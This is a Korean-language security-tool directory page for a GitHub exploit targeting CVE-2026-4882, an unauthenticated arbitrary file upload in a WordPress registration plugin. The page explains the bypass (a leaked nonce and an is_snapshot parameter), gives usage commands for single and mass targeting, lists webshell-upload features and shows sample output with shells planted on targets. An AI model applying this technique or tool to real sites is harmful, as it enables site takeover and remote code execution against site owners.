Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-4882 — User Registration Advanced Fields <= 1.6.20 - 인증되지 않은 임의 파일 업로드 | Kitploit
도구/GitHubGitHub/xshadow-here/cve-2026-4882
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingRed Teaming
GitHubxshadow-here/cve-2026-4882

CVE-2026-4882

User Registration Advanced Fields <= 1.6.20 - 인증되지 않은 임의 파일 업로드

저장소 보기
13개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-4882

User Registration Advanced Fields <= 1.6.20 - 인증 없이 임의 파일 업로드

설명 :

User Registration Advanced Fields <= 1.6.20 - 인증 없이 임의 파일 업로드 설명 WordPress용 User Registration Advanced Fields 플러그인(1.6.20 이하 버전)은 uraf_profile_picture_upload_method_upload AJAX 액션을 통해 인증되지 않은 임의 파일 업로드에 취약합니다. 이 플러그인은 등록 양식이 포함된 모든 페이지에서 wp_localize_script()를 통해 유효한 nonce를 노출하며, is_snapshot=1 파라미터를 사용하면 파일 확장자 검증을 완전히 우회합니다. 이를 통해 인증되지 않은 공격자는 임의 파일(예: GIF 이미지로 위장한 PHP 웹쉘)을 업로드할 수 있으며, 해당 파일은 wp-content/uploads/user_registration_uploads/temp-uploads/에 저장되어 완전한 원격 코드 실행(RCE)으로 이어집니다.

정보 : CVE-2026-4882

~ CVSS 점수: 9.8 (치명적)

~ 영향받는 버전: <= 1.6.20

  • 연구원 : 0xd4rk5id3 - EnvoraSec

사용법:

단일 대상:

  • python3 shadow.py -u https://target.com -s shadow.php

대량 대상:

  • python3 shadow.py -f targets.txt -s shadow.php -t 30

대화형 모드:

  • python3 shadow.py
  • 대상 파일 이름 입력
  • 스레드 1-50 최대 입력

기능:

  • 멀티스레딩
  • 오류 처리
  • 자동 Nonce + Form ID 탐색
  • 홈페이지 및 사이트맵 크롤링 (사용자 정의 등록 경로)
  • 무차별 대입 Form ID 폴백
  • 자동 HTTP/HTTPS 리다이렉트 해석
  • GIF89a 폴리글롯 셸 업로드
  • 셸 검증
  • 결과를 shell.txt에 자동 저장

출력:

root@kitploit:~

╔══════════════════════════════════════════════════╗
║   CVE-2026-4882 — Full Auto Exploit              ║
║   User Registration Advanced Fields <= 1.6.20    ║
║   by: Shadow x Friska 😈🔥                      ║
╚══════════════════════════════════════════════════╝

  ═══ Interactive Mode ═══

  📄 Target file (e.g. targets.txt): list.txt
  ⚡ Threads 1-50 (default 30): 30

  🎯 Targets : 75
  📁 Shell   : shadow.php
  ⚡ Threads : 30
  💣 Brute   : 1-500

  🩷 [3/75] http://target.com
     → http://target.com/wp-content/uploads/user_registration_uploads/temp-uploads/shadow.php
  💀 [1/75] http://example.com — no nonce
  ❌ [4/75] http://example2.com — upload failed

면책 조항:

이 도구는 교육 및 보안 테스트 목적으로만 사용됩니다.

소유하지 않았거나 테스트 권한이 없는 시스템에 대한 무단 사용은 불법입니다.

도구 다운로드